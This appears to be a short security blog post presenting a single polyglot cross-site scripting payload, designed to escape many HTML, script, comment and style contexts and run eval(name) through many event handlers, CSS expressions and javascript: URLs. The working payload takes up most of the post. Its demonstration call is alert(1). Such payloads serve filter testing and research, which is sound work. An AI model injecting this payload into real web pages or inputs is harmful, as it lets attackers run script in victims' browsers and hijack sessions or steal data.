One vector to rule them all
Published: Wed, 15 Sep 2010 08:37:06 GMT
Updated: Sat, 22 Mar 2025 15:38:16 GMT
I set myself a fun challenge to create a vector that would execute in many contexts. The idea being that it should work regardless where it's placed. For example:-
<pre lang="javascript"> "xss" 'xss' <tag alt="xss"> </pre>As an added challenge I tried to execute only the one payload and where possible to use a single eval. I had to use multiple evals as the contexts increased because for stuff like background= etc there was no way I could figure reusing the existing one :( So I had around 19 then got bored.
One vector to xss them all, one vector to find them, One vector to bring them all and in the darkness bind them.
<code lang="javascript"> javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" </code>Updated added new vectors and removed any that weren't required. Thanks to @LeverOne!!
2nd Update...Fixed comments, added name to [] rule so it executes without window.name for dom rules. Thanks again for some fixes by @LeverOne